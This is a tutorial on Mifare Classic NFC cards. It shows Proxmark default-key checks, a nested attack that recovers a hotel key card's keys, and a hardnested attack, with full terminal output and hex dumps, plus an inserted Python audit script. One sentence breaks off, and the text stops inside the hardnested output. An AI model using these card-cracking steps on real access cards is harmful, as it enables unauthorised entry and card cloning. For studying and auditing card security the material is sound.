Mifare Classic & NFC


Mifare is a brand of chips for contactless smart cards made by NXP . If you’ve ever had an access card for hotel rooms, a contactless payment card for a canteen or even a modern bus ticket in your hand, you will have used one of the Mifare flavours.

The simplest version is Mifare Ultralight, which is often used for contactless room keys in hotels or for short-term tickets in public transport. Each card has a 512-bit EEPROM which contains:

  • UID / Serial Number
  • Access control bits managing which parts of the user data may be written / changed
  • User data
  • A dedicated OTP area

They don’t have any means of protection or encryption except for the optional write protection. As such, their read protection is just as good as that of a printed piece of paper: protection has to be applied on the application layer and has to cover the risk of cloning the card.

The version covered on this page is Mifare Classic, which has a very bad history of being hacked, cracked and broken…

Mifare Classic

The most widely used Mifare Classic chips come with 1k of memory, split into 16 sectors of 4 blocks each. Sector 0, block 0 contains the UID (either 4 or 7 bytes) and further manufacturer information. Block 3 of each sector (the “Sector Trailer”) cannot be used for data (except for byte 9) but holds the applicable access keys and access bits: 6 bytes KEY A, 3 bytes access bits, 1 byte user data and 6 bytes KEY B. It is important to note that byte 9 of the Sector Trailer may contain user data.

As “containing keys” already implies, Mifare Classic cards offer some protection for stored data. Depending on the configuration (access bits), these keys are necessary for reading and writing data on the card. Also, communication with the card is encrypted using the CRYPTO1 algorithm.
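The layout just described is easy to check mechanically. The following Python is an added example, not code from this page or from the Proxmark project: it splits a raw 1k dump into sectors, decodes each sector trailer (key A, access bits, user byte, key B), verifies the inverse-nibble redundancy built into the access bytes, and flags what an auditor cares about: factory-default keys and trailer configurations in which key B is readable with key A and therefore protects nothing. It also maps block numbers to sectors, which matters later because some Proxmark commands take a block number while fchk reports per sector. The sample dump is constructed inline from the trailer bytes that appear in the dumps on this page (ff 07 80 69 with the page's key values); the access-condition interpretation follows the NXP MIFARE Classic datasheet.

```python
# Added example (not from the page or the Proxmark project): parse a MIFARE
# Classic 1k dump and audit every sector trailer for weak configuration.
# Layout: 16 sectors x 4 blocks x 16 bytes. Block 3 of each sector is the
# trailer: key A (6) | access bits (3) | user byte (1) | key B (6).

BLOCK_SIZE = 16
BLOCKS_PER_SECTOR = 4
SECTORS_1K = 16
DUMP_SIZE_1K = BLOCK_SIZE * BLOCKS_PER_SECTOR * SECTORS_1K  # 1024 bytes

# Well-known factory/default keys (the same list hf mf fchk tries).
DEFAULT_KEYS = {
    "ffffffffffff", "000000000000", "a0a1a2a3a4a5", "b0b1b2b3b4b5",
    "c0c1c2c3c4c5", "d0d1d2d3d4d5", "aabbccddeeff", "1a2b3c4d5e6f",
    "123456789abc", "010203040506", "123456abcdef", "abcdef123456",
    "4d3a99c351dd", "1a982c7e459a", "d3f7d3f7d3f7", "714c5c886e97",
    "587ee5f9350f", "a0478cc39091", "533cb6c723f6", "8fd0a4f256e9",
}

# Trailer conditions (C1, C2, C3 of block 3) under which key B can be read
# with key A, i.e. key B is ordinary data rather than a secret (datasheet).
KEY_B_READABLE = {(0, 0, 0), (0, 1, 0), (0, 0, 1)}


def sector_of_block(block):
    """1k cards: block n lives in sector n // 4 (block 9 is in sector 2)."""
    return block // BLOCKS_PER_SECTOR


def trailer_block(sector):
    """Absolute block number of a sector's trailer (sector 2 -> block 11)."""
    return sector * BLOCKS_PER_SECTOR + 3


def decode_access_bits(b6, b7, b8):
    """Decode the three access bytes into (consistent, conditions per block).

    Byte 6 = ~C2 | ~C1, byte 7 = C1 | ~C3, byte 8 = C3 | C2 (high | low nibble).
    Every nibble is stored together with its inverse; if they disagree the
    trailer is corrupt, and a sector becomes irreversibly blocked once such a
    trailer is written to the card.
    """
    c1, c2, c3 = (b7 >> 4) & 0xF, b8 & 0xF, (b8 >> 4) & 0xF
    inv_c1, inv_c2, inv_c3 = b6 & 0xF, (b6 >> 4) & 0xF, b7 & 0xF
    consistent = (c1 ^ inv_c1, c2 ^ inv_c2, c3 ^ inv_c3) == (0xF, 0xF, 0xF)
    conds = tuple(((c1 >> blk) & 1, (c2 >> blk) & 1, (c3 >> blk) & 1)
                  for blk in range(BLOCKS_PER_SECTOR))
    return consistent, conds


def audit_dump(dump):
    """Return one finding dict per sector of a raw 1k dump."""
    if len(dump) != DUMP_SIZE_1K:
        raise ValueError(f"expected {DUMP_SIZE_1K}-byte dump, got {len(dump)}")
    findings = []
    for sector in range(SECTORS_1K):
        base = sector * BLOCKS_PER_SECTOR * BLOCK_SIZE
        trailer = dump[base + 3 * BLOCK_SIZE: base + 4 * BLOCK_SIZE]
        key_a, key_b = trailer[0:6].hex(), trailer[10:16].hex()
        consistent, conds = decode_access_bits(trailer[6], trailer[7], trailer[8])
        findings.append({
            "sector": sector,
            "key_a": key_a,
            "key_b": key_b,
            "user_byte": trailer[9],
            "consistent": consistent,
            "key_a_default": key_a in DEFAULT_KEYS,
            "key_b_default": key_b in DEFAULT_KEYS,
            # (0,0,0) on a data block = transport configuration: either key
            # may read and write the block.
            "data_blocks_transport": all(c == (0, 0, 0) for c in conds[:3]),
            "key_b_readable_with_a": conds[3] in KEY_B_READABLE,
        })
    return findings


def build_sample_dump():
    """Constructed 1k dump with the trailers seen on this page: sector 0 key A
    6661f36cc44b, sector 1 2a2c13cc242a, sectors 2-3 ffffffffffff, the rest
    6661f36cc44b; every key B ffffffffffff; access bytes ff 07 80, user 69."""
    key_a_by_sector = ["6661f36cc44b", "2a2c13cc242a", "ffffffffffff", "ffffffffffff"]
    key_a_by_sector += ["6661f36cc44b"] * 12
    dump = bytearray()
    for key_a in key_a_by_sector:
        dump += bytes(3 * BLOCK_SIZE)  # three zeroed data blocks
        dump += bytes.fromhex(key_a + "ff078069" + "ffffffffffff")
    return bytes(dump)


if __name__ == "__main__":
    for f in audit_dump(build_sample_dump()):
        flags = [k for k in ("key_a_default", "key_b_default",
                             "key_b_readable_with_a") if f[k]]
        print(f"sector {f['sector']:2d}: A={f['key_a']} B={f['key_b']} "
              f"access_ok={f['consistent']} {' '.join(flags)}")
```

To run it against a real file, replace build_sample_dump() with open("hf-mf-<UID>-data.bin", "rb").read(). On the constructed dump every sector reports key_b_readable_with_a, which is exactly why a card in transport configuration gives no more security from key B than from key A.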

Tools

Proxmark

The Proxmark is probably the most used tool when doing RFID/NFC research. It consists of a USB reader with a fat firmware and a terminal client used to control the device. It comes with a large command set for most things one might want to do with contactless cards, and it also offers standalone functionality.

Chameleon Mini

The Chameleon Mini is an NFC card emulator, which can also be used as a reader/writer. It runs off a CR2032 coin cell and is aimed at standalone use. It comes with a Windows-based UI which does not make a very stable impression, but does the job.

MiFare Dongles / Cards

When working with NFC one will need various cards and dongles to play and experiment with. Just get a random set of Mifare Classic cards. I’m currently working with this set from Amazon.

HowTo

Proxmark & Dumping

First you will need to fetch the software necessary for running the Proxmark. Back when I first had a look at it, I was told to stick to the Iceman Fork of the Firmware and have used it since.

It can easily be fetched from GitHub with git clone https://github.com/iceman1001/proxmark3.git.

Working with Mifare cards, you need to use the hf command.

pm3 --> hf
help             This help
14a              { ISO14443A RFIDs...            }
14b              { ISO14443B RFIDs...            }
15               { ISO15693 RFIDs...             }
epa              { German Identification Card... }
emv              { EMV RFIDs...                  }
felica           { ISO18092 / Felica RFIDs...    }
legic            { LEGIC RFIDs...                }
iclass           { ICLASS RFIDs...               }
mf               { MIFARE RFIDs...               }
mfu              { MIFARE Ultralight RFIDs...    }
mfdes            { MIFARE Desfire RFIDs...       }
topaz            { TOPAZ (NFC Type 1) RFIDs...   }
list             List protocol data in trace buffer
tune             Continuously measure HF antenna tuning
search           Search for known HF tags [preliminary]
snoop            <samples to skip (10000)> <triggers to skip (1)> Generic HF Snoop

Using hf search we can make sure that the card is actually readable.

pm3 --> hf search
 UID : DA 7C A0 10
ATQA : 00 04
 SAK : 08 [2]
TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1 | 1k Ev1
[=] proprietary non iso14443-4 card found, RATS not supported
[+] Answers to magic commands (GEN 1a): YES
[+] Prng detection: WEAK
          
[+] Valid ISO14443-A Tag Found

We can then carry on using the hf mf commands. hf mf fchk 1 will try a set of commonly used and default keys against the card; the 1 selects the Mifare Classic 1k mode.

pm3 --> hf mf fchk 1
[+] No key specified, trying default keys          
[ 0] ffffffffffff          
[ 1] 000000000000          
[ 2] a0a1a2a3a4a5          
[ 3] b0b1b2b3b4b5          
[ 4] c0c1c2c3c4c5          
[ 5] d0d1d2d3d4d5          
[ 6] aabbccddeeff          
[ 7] 1a2b3c4d5e6f          
[ 8] 123456789abc          
[ 9] 010203040506          
[10] 123456abcdef          
[11] abcdef123456          
[12] 4d3a99c351dd          
[13] 1a982c7e459a          
[14] d3f7d3f7d3f7          
[15] 714c5c886e97          
[16] 587ee5f9350f          
[17] a0478cc39091          
[18] 533cb6c723f6          
[19] 8fd0a4f256e9          
[+] Running strategy 1          

[-] Chunk: 0,4s | found 32/32 keys (20)          
[+] Time in checkkeys (fast):  0,4s
          
|---|----------------|---|----------------|---|          
|sec|key A           |res|key B           |res|          
|---|----------------|---|----------------|---|          
|000|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|001|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|002|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|003|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|004|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|005|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|006|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|007|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|008|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|009|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|010|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|011|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|012|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|013|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|014|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|015|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|---|----------------|---|----------------|---|

This is the list of keys necessary for reading data from the card. I tend to use the d parameter, too: running hf mf fchk 1 d will create a file called hf-mf-DA7CA010-keys.bin. As you can see, all keys are set to ffff ffff ffff, which are the default factory keys. We can now dump the data from the card using hf mf dump 1. As described in hf mf dump h, the 1 is again the parameter for 1k cards. By default the command will create a file named after the UID of the card, for us hf-mf-DA7CA010-data.bin. When you get a message like #db# Read block error, I’d simply recommend to repeat the dump.

The command results in the following file:

00000000: 7a8a 2710 c708 0400 6263 6465 6667 6869  z.'.....bcdefghi
00000010: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000020: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000030: ffff ffff ffff ff07 8069 ffff ffff ffff  .........i......
00000040: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000050: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000060: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000070: ffff ffff ffff ff07 8069 ffff ffff ffff  .........i......
00000080: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000090: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000000a0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000000b0: ffff ffff ffff ff07 8069 ffff ffff ffff  .........i......
000000c0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000000d0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000000e0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000000f0: ffff ffff ffff ff07 8069 ffff ffff ffff  .........i......
00000100: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000110: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000120: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000130: ffff ffff ffff ff07 8069 ffff ffff ffff  .........i......
00000140: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000150: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000160: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000170: ffff ffff ffff ff07 8069 ffff ffff ffff  .........i......
00000180: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000190: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000001a0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000001b0: ffff ffff ffff ff07 8069 ffff ffff ffff  .........i......
000001c0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000001d0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000001e0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000001f0: ffff ffff ffff ff07 8069 ffff ffff ffff  .........i......
00000200: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000210: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000220: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000230: ffff ffff ffff ff07 8069 ffff ffff ffff  .........i......
00000240: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000250: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000260: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000270: ffff ffff ffff ff07 8069 ffff ffff ffff  .........i......
00000280: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000290: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000002a0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000002b0: ffff ffff ffff ff07 8069 ffff ffff ffff  .........i......
000002c0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000002d0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000002e0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000002f0: ffff ffff ffff ff07 8069 ffff ffff ffff  .........i......
00000300: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000310: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000320: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000330: ffff ffff ffff ff07 8069 ffff ffff ffff  .........i......
00000340: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000350: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000360: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000370: ffff ffff ffff ff07 8069 ffff ffff ffff  .........i......
00000380: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000390: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000003a0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000003b0: ffff ffff ffff ff07 8069 ffff ffff ffff  .........i......
000003c0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000003d0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000003e0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000003f0: ffff ffff ffff ff07 8069 ffff ffff ffff  .........i......

The dump contains only the vendor information, i.e. the tag’s serial, plus the access bits and keys of each sector.

Proxmark & Cracking & Dumping (nested)

Now for a real card: A hotel key card!

Verify the card is Mifare Classic:

pm3 --> hf search
 UID : 84 06 65 36           
ATQA : 00 04          
 SAK : 08 [2]          
TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1 | 1k Ev1          
[=] proprietary non iso14443-4 card found, RATS not supported          
[=] Answers to magic commands: NO          
[+] Prng detection: WEAK          
          
[+] Valid ISO14443-A Tag Found

Go for default keys:

pm3 --> hf mf fchk 1 d
[+] No key specified, trying default keys          
[ 0] ffffffffffff          
[ 1] 000000000000          
[ 2] a0a1a2a3a4a5          
[ 3] b0b1b2b3b4b5          
[ 4] c0c1c2c3c4c5          
[ 5] d0d1d2d3d4d5          
[ 6] aabbccddeeff          
[ 7] 1a2b3c4d5e6f          
[ 8] 123456789abc          
[ 9] 010203040506          
[10] 123456abcdef          
[11] abcdef123456          
[12] 4d3a99c351dd          
[13] 1a982c7e459a          
[14] d3f7d3f7d3f7          
[15] 714c5c886e97          
[16] 587ee5f9350f          
[17] a0478cc39091          
[18] 533cb6c723f6          
[19] 8fd0a4f256e9          
[+] Running strategy 1          

[-] Chunk: 1,9s | found 18/32 keys (20)          
[+] Running strategy 2          

[-] Chunk: 2,0s | found 18/32 keys (20)          
[+] Time in checkkeys (fast):  3,9s
          
|---|----------------|---|----------------|---|          
|sec|key A           |res|key B           |res|          
|---|----------------|---|----------------|---|          
|000|  ------------  | 0 |  ffffffffffff  | 1 |          
|001|  ------------  | 0 |  ffffffffffff  | 1 |          
|002|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|003|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|004|  ------------  | 0 |  ffffffffffff  | 1 |          
|005|  ------------  | 0 |  ffffffffffff  | 1 |          
|006|  ------------  | 0 |  ffffffffffff  | 1 |          
|007|  ------------  | 0 |  ffffffffffff  | 1 |          
|008|  ------------  | 0 |  ffffffffffff  | 1 |          
|009|  ------------  | 0 |  ffffffffffff  | 1 |          
|010|  ------------  | 0 |  ffffffffffff  | 1 |          
|011|  ------------  | 0 |  ffffffffffff  | 1 |          
|012|  ------------  | 0 |  ffffffffffff  | 1 |          
|013|  ------------  | 0 |  ffffffffffff  | 1 |          
|014|  ------------  | 0 |  ffffffffffff  | 1 |          
|015|  ------------  | 0 |  ffffffffffff  | 1 |          
|---|----------------|---|----------------|---|          
Printing keys to binary file ...          
Found keys have been dumped to file . 0xffffffffffff has been inserted for unknown keys.

As you can see, we’re missing a fair number of keys, so we’ll have to start cracking. As we have a few known keys (the ffffffffffff ones we found) and the initial read of the card said Prng detection: WEAK, we can use the nested attack.

We will use hf mf nested 1 9 A ffffffffffff d. The 1 again sets the mode to a 1k card; 9 A tells the command that we have a known key for block 9 and that it is an A key; ffffffffffff is the known key; d stores the extracted keys into a file.

It is important to note that you pass a block number here, not a

pm3 --> hf mf nested 1 9 A ffffffffffff d
[+] Testing known keys. Sector count=16          
.
[-] Chunk: 2,0s | found 18/32 keys (21)          
[+] Time to check 20 known keys: 2 seconds
          
[+] enter nested attack          
[+] target block:  0 key type: A          
[+] target block:  4 key type: A          
[+] target block: 16 key type: A  -- found valid key [6661f36cc44b]          

[-] Chunk: 0,4s | found 31/32 keys (1)          
[+] target block:  4 key type: A          
[+] target block:  4 key type: A          
[+] target block:  4 key type: A  -- found valid key [2a2c13cc242a]          

[-] Chunk: 0,6s | found 19/32 keys (1)          
[+] time in nested: 7 seconds
          
[+] trying to read key B...          
|---|----------------|---|----------------|---|          
|sec|key A           |res|key B           |res|          
|---|----------------|---|----------------|---|          
|000|  6661f36cc44b  | 1 |  ffffffffffff  | 1 |          
|001|  2a2c13cc242a  | 1 |  ffffffffffff  | 1 |          
|002|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|003|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|004|  6661f36cc44b  | 1 |  ffffffffffff  | 1 |          
|005|  6661f36cc44b  | 1 |  ffffffffffff  | 1 |          
|006|  6661f36cc44b  | 1 |  ffffffffffff  | 1 |          
|007|  6661f36cc44b  | 1 |  ffffffffffff  | 1 |          
|008|  6661f36cc44b  | 1 |  ffffffffffff  | 1 |          
|009|  6661f36cc44b  | 1 |  ffffffffffff  | 1 |          
|010|  6661f36cc44b  | 1 |  ffffffffffff  | 1 |          
|011|  6661f36cc44b  | 1 |  ffffffffffff  | 1 |          
|012|  6661f36cc44b  | 1 |  ffffffffffff  | 1 |          
|013|  6661f36cc44b  | 1 |  ffffffffffff  | 1 |          
|014|  6661f36cc44b  | 1 |  ffffffffffff  | 1 |          
|015|  6661f36cc44b  | 1 |  ffffffffffff  | 1 |          
|---|----------------|---|----------------|---|          
[+] saving keys to binary file hf-mf-84066536-key.bin... 

Now we dump the data:

pm3 --> hf mf dump h
Usage:   hf mf dump [card memory] k <name> f <name>          
  [card memory]: 0 = 320 bytes (Mifare Mini), 1 = 1K (default), 2 = 2K, 4 = 4K          
  k <name>     : key filename, if no <name> given, UID will be used as filename          
  f <name>     : data filename, if no <name> given, UID will be used as filename          
          
Examples:          
         hf mf dump          
         hf mf dump 4          
pm3 --> hf mf dump 1
|-----------------------------------------|          
|------ Reading sector access bits...-----|          
|-----------------------------------------|          
|-----------------------------------------|          
|----- Dumping all blocks to file... -----|          
|-----------------------------------------|          
[+] successfully read block  0 of sector  0.          
[+] successfully read block  1 of sector  0.          
[+] successfully read block  2 of sector  0.          
[+] successfully read block  3 of sector  0.          
[+] successfully read block  0 of sector  1.          
[+] successfully read block  1 of sector  1.          
[+] successfully read block  2 of sector  1.          
[+] successfully read block  3 of sector  1.          
[+] successfully read block  0 of sector  2.          
[+] successfully read block  1 of sector  2.          
[+] successfully read block  2 of sector  2.          
[+] successfully read block  3 of sector  2.          
[+] successfully read block  0 of sector  3.          
[+] successfully read block  1 of sector  3.          
[+] successfully read block  2 of sector  3.          
[+] successfully read block  3 of sector  3.          
[+] successfully read block  0 of sector  4.          
[+] successfully read block  1 of sector  4.          
[+] successfully read block  2 of sector  4.          
[+] successfully read block  3 of sector  4.          
[+] successfully read block  0 of sector  5.          
[+] successfully read block  1 of sector  5.          
[+] successfully read block  2 of sector  5.          
[+] successfully read block  3 of sector  5.          
[+] successfully read block  0 of sector  6.          
[+] successfully read block  1 of sector  6.          
[+] successfully read block  2 of sector  6.          
[+] successfully read block  3 of sector  6.          
[+] successfully read block  0 of sector  7.          
[+] successfully read block  1 of sector  7.          
[+] successfully read block  2 of sector  7.          
[+] successfully read block  3 of sector  7.          
[+] successfully read block  0 of sector  8.          
[+] successfully read block  1 of sector  8.          
[+] successfully read block  2 of sector  8.          
[+] successfully read block  3 of sector  8.          
[+] successfully read block  0 of sector  9.          
[+] successfully read block  1 of sector  9.          
[+] successfully read block  2 of sector  9.          
[+] successfully read block  3 of sector  9.          
[+] successfully read block  0 of sector 10.          
[+] successfully read block  1 of sector 10.          
[+] successfully read block  2 of sector 10.          
[+] successfully read block  3 of sector 10.          
[+] successfully read block  0 of sector 11.          
[+] successfully read block  1 of sector 11.          
[+] successfully read block  2 of sector 11.          
[+] successfully read block  3 of sector 11.          
[+] successfully read block  0 of sector 12.          
[+] successfully read block  1 of sector 12.          
[+] successfully read block  2 of sector 12.          
[+] successfully read block  3 of sector 12.          
[+] successfully read block  0 of sector 13.          
[+] successfully read block  1 of sector 13.          
[+] successfully read block  2 of sector 13.          
[+] successfully read block  3 of sector 13.          
[+] successfully read block  0 of sector 14.          
[+] successfully read block  1 of sector 14.          
[+] successfully read block  2 of sector 14.          
[+] successfully read block  3 of sector 14.          
[+] successfully read block  0 of sector 15.          
[+] successfully read block  1 of sector 15.          
[+] successfully read block  2 of sector 15.          
[+] successfully read block  3 of sector 15.          
[+] dumped 64 blocks (1024 bytes) to file hf-mf-84066536-data.bin 

The result:

00000000: 8406 6536 d108 0400 0199 f9b7 befe 3d1d  ..e6..........=.
00000010: bfc0 9956 6469 9683 e52e ff21 f28a df9b  ...Vdi.....!....
00000020: 8a00 0400 0100 0000 0000 0000 0000 0000  ................
00000030: 6661 f36c c44b ff07 8069 ffff ffff ffff  fa.l.K...i......
00000040: 0000 0000 0000 0000 0000 00c1 0000 00c1  ................
00000050: 0000 0000 0000 0000 0000 00c1 0000 0000  ................
00000060: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000070: 2a2c 13cc 242a ff07 8069 ffff ffff ffff  *,..$*...i......
00000080: 02d7 c800 0000 0000 0000 0000 0000 0000  ................
00000090: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000000a0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000000b0: ffff ffff ffff ff07 8069 ffff ffff ffff  .........i......
000000c0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000000d0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000000e0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000000f0: ffff ffff ffff ff07 8069 ffff ffff ffff  .........i......
00000100: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000110: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000120: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000130: 6661 f36c c44b ff07 8069 ffff ffff ffff  fa.l.K...i......
00000140: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000150: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000160: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000170: 6661 f36c c44b ff07 8069 ffff ffff ffff  fa.l.K...i......
00000180: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000190: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000001a0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000001b0: 6661 f36c c44b ff07 8069 ffff ffff ffff  fa.l.K...i......
000001c0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000001d0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000001e0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000001f0: 6661 f36c c44b ff07 8069 ffff ffff ffff  fa.l.K...i......
00000200: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000210: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000220: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000230: 6661 f36c c44b ff07 8069 ffff ffff ffff  fa.l.K...i......
00000240: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000250: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000260: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000270: 6661 f36c c44b ff07 8069 ffff ffff ffff  fa.l.K...i......
00000280: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000290: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000002a0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000002b0: 6661 f36c c44b ff07 8069 ffff ffff ffff  fa.l.K...i......
000002c0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000002d0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000002e0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000002f0: 6661 f36c c44b ff07 8069 ffff ffff ffff  fa.l.K...i......
00000300: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000310: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000320: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000330: 6661 f36c c44b ff07 8069 ffff ffff ffff  fa.l.K...i......
00000340: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000350: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000360: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000370: 6661 f36c c44b ff07 8069 ffff ffff ffff  fa.l.K...i......
00000380: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000390: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000003a0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000003b0: 6661 f36c c44b ff07 8069 ffff ffff ffff  fa.l.K...i......
000003c0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000003d0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000003e0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000003f0: 6661 f36c c44b ff07 8069 ffff ffff ffff  fa.l.K...i......

Proxmark & Cracking & Dumping (hardnested)

When doing hf search you’ll sometimes find the line [+] Prng detection: HARD.

pm3 --> hf search
 UID : 73 6B 19 DB           
ATQA : 00 04          
 SAK : 08 [2]          
TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1 | 1k Ev1          
[=] proprietary non iso14443-4 card found, RATS not supported          
[=] Answers to magic commands: NO          
[+] Prng detection: HARD          
          
[+] Valid ISO14443-A Tag Found

This tells you that the card is not vulnerable to the nested attack. Running it anyway will result in the error message shown below.

pm3 --> hf mf nested 1 9 A ffffffffffff d
[+] Testing known keys. Sector count=16          
..
[-] Chunk: 5,1s | found 18/32 keys (21)          
[+] Time to check 20 known keys: 5 seconds
          
[+] enter nested attack          
[-] Tag isn't vulnerable to Nested Attack (PRNG is not predictable).

In this situation you can use the hardnested attack instead, which should solve the problem; hf mf hardnested 9 A ffffffffffff 4 A will do the job. hf mf fchk gave us an A key for block 9, which was ffffffffffff, and we want to attack the A key for block 4.

pm3 --> hf mf hardnested 9 A ffffffffffff 4 A
--target block no:  4, target key type:A, known target key: 0x000000000000 (not set), file action: none, Slow: No, Tests: 0           


          
 time    | #nonces | Activity                                                | expected to brute force          
         |         |                                                         | #states         | time           
------------------------------------------------------------------------------------------------------          
       0 |       0 | Start using 8 threads and AVX2 SIMD core                |                 |          
       0 |       0 | Brute force benchmark: 1091 million (2^30,0) keys/s     | 140737488355328 |   36h          
       1 |       0 | Using 235 precalculated bitflip state tables            | 140737488355328 |   36h          
       4 |     112 | Apply bit flip properties                               |    147390365696 |  2min          
       5 |     224 | Apply bit flip properties                               |     43779555328 |   40s          
       6 |     336 | Apply bit flip properties                               |     21652844544 |   20s          
       7 |     448 | Apply bit flip properties                               |     19419289600 |   18s          
       8 |     558 | Apply bit flip properties                               |     19367587840 |   18s          
       9 |     670 | Apply bit flip properties                               |     18187343872 |   17s          
       9 |     780 | Apply bit flip properties                               |     18187343872 |   17s          
      10 |     891 | Apply bit flip properties                               |     18187343872 |   17s          
      10 |    1002 | Apply bit flip properties                               |     18187343872 |   17s          
      11 |    1112 | Apply bit flip properties                               |     18187343872 |   17s          
      12 |    1224 | Apply bit flip properties                               |     18187343872 |   17s          
      13 |    1334 | Apply bit flip properties                               |     18187343872 |   17s          
      14 |    1443 | Apply bit flip properties                               |     18187343872 |   17s          
      15 |    1553 | Apply bit flip properties                               |     18187343872 |   17s          
      17 |    1661 | Apply Sum property. Sum(a0) = 96                        |      3629149440 |    3s          
      17 |    1770 | Apply bit flip properties                               |      3629149440 |    3s          
      18 |    1881 | Apply bit flip properties                               |      3629149440 |    3s          
      18 |    1991 | Apply bit flip properties                               |      3629149440 |    3s          
      19 |    1991 | (Ignoring Sum(a8) properties)                           |      3629149440 |    3s          
